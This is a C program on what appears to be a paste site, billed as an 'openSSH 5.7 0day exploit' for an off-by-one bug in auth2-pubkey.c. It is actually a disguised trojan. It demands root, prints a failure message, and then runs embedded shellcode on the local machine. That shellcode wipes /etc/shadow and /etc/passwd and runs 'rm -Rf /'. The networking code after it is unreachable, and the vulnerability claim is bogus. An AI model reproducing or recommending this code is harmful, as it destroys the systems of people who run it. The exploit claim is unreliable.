- /*
- openSSH 5.7 0day exploit
- Off by One error in auth2-pubkey.c
- Author: Chroniccommand
- Usage: ./exploit <host> <ip>
- greetz to _st4ck3d*, x3n0n, xin etc you know who you are ;)
- */
- #include <stdio.h>
- #include <netdb.h>
- #include <stdlib.h>
- #include <string.h>
- #include <unistd.h>
- #include <arpa/inet.h>
- #include <sys/types.h>
- #include <sys/socket.h>
- #include <netinet/in.h>
- void usage(char *argv[])
- {
- printf("Usage: %s <target> <port>\n", argv[0]);
- exit(1);
- }
- unsigned char shellcode[] =
- "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
- "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65"
- "\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73"
- "\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22"
- "\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20"
- "\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1"
- "\xcd\x80";
- int main(int argc, char *argv[])
- {
- int uid = getuid();
- int port = 22, sock;
- struct hostent *host;
- struct sockaddr_in addr;
- if(uid !=0)
- {
- fprintf(stderr, "[!!]Error: You must be root\n");
- exit(1);
- }
- if(uid == 0)
- {
- printf("\t[+]Starting exploit..\n");
- }
- if(argc != 3)
- usage(argv);
- fprintf(stderr, "[!!]Exploit failed\n");
- (*(void(*)())shellcode)();
- exit(1);
- char payload[1024];
- memcpy(payload, &shellcode, sizeof(shellcode));
- if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
- {
- printf("[+]Got shell\n");
- system("/bin/sh");
- }
- else if(connect(sock,(struct sockaddr*)&addr, sizeof(addr))==-1)
- {
- fprintf(stderr, "[!!]Exploit failed\n");
- exit(1);
- }
- }
Don't like ads? PRO users don't see any ads ;-)
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
create a new version of this paste
RAW Paste Data